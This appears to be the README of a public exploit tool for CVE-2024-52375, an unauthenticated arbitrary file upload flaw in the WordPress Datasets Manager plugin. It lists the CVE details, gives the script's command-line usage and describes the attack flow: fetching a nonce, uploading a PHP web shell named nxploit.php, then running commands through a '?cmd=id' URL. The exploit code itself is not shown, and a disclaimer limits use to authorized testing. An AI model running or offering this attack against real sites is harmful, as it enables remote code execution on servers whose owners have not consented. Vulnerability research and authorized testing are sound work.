
# WordPress Datasets Manager <= 1.5 - Arbitrary File Upload (CVE-2024-52375)

> 💥 Exploit by: Nxploit (Khaled Alenazi)  
> 📅 CVE Published: November 14, 2024  
> 🧠 CVSS Score: **10.0 (Critical)**  
> 🛠 CWE-434: Unrestricted Upload of File with Dangerous Type

---

## 📌 Description

A critical vulnerability was discovered in the **Datasets Manager by Arttia Creative** WordPress plugin, affecting all versions **up to and including 1.5**.

The plugin fails to properly validate file types during the upload process, allowing an unauthenticated attacker to upload arbitrary files — including PHP shells — and achieve **Remote Code Execution (RCE)**.

---

## 🧠 CVE Details

- **CVE ID:** CVE-2024-52375  
- **Plugin Affected:** Datasets Manager by Arttia Creative  
- **Affected Versions:** <= 1.5  
- **Vulnerability Type:** Arbitrary File Upload (Unauthenticated)  
- **CWE:** [CWE-434](https://cwe.mitre.org/data/definitions/434.html) - Unrestricted Upload of File with Dangerous Type  
- **CVSS v3.1:** `AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`  
- **Severity:** 🔴 CRITICAL (10.0)

---

## ⚙️ Requirements

- Python 3.x
- `requests` library:
  ```bash
  pip install requests
  ```

---

## 🚀 Usage

```bash

usage: CVE-2024-52375.py [-h] -u URL

Exploit for WordPress Datasets Manager <= 1.5 - Arbitrary File Upload | By: Nxploit | Khaled Alenazi

options:
  -h, --help     show this help message and exit
  -u, --url URL  Full target URL (e.g. http://target.com/wordpress)

```

> Replace the URL with the full path to the target WordPress installation.

---

## ✅ Expected Output

If successful, the script will:

1. Extract the public `_wpnonce` from the frontend.
2. Upload a PHP shell named `nxploit.php`.
3. Check if the shell is accessible and display its URL:

```
[+] Shell available at:
    http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php
```

You can then execute commands like:

```
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php?cmd=id
```

---

## 🔒 Notes

- The exploit checks the plugin version automatically via `readme.txt`.
- Only versions `<= 1.5` are vulnerable.
- No authentication is required.

---


---

## 📢 Disclaimer

This tool is provided for **educational and authorized testing purposes only**.  
Using it against systems you do not own or have permission to test is **illegal**.
